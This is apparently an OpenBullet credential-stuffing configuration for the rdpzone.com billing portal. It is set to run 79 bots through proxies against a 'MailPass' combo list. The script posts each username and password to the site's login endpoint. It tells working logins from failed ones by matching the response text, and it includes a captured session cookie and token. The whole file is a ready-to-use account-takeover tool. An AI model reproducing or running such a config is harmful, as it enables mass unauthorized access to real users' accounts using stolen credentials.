[SETTINGS]
{
  "Name": "rdpzone.com",
  "SuggestedBots": 79,
  "LastModified": "2019-04-07T16:18:55.3031882+07:00",
  "AdditionalInfo": "",
  "Author": "",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://www.rdpzone.com/billing/dologin.php" AutoRedirect=TRUE 
  CONTENT "token=36abe0786d188c52027899bc66302390d6037d42&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Host: www.rdpzone.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Origin: https://www.rdpzone.com" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "DNT: 1" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "Referer: https://www.rdpzone.com/billing/clientarea.php" 
  HEADER "Accept-Language: en,en-US;q=0.9,ar;q=0.8" 
  HEADER "Cookie: __zlcmid=qmi0QIzoMKVaXm; WHMCSQ5zygMZt1JOi=tmrj43cvls7qllc7clj3hph5g1" 
  HEADER "Accept-Encoding: gzip, deflate" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Login Details Incorrect. Please try again." 
  KEYCHAIN Success OR 
    KEY "\"dropdown account\"" 
